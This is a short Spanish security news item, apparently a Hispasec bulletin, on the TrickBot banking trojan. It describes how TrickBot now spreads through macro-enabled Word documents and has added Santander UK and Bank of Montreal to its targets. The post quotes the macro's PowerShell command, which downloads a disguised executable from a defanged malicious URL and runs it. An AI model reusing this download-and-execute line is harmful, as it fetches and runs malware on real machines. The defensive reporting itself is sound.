Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido

Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process

Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa

http://unaaldia.hispasec.com/2016/11/el-troyano-bancario-trickbot-azota.html

  

Fernando Díaz

fdiaz@hispasec.com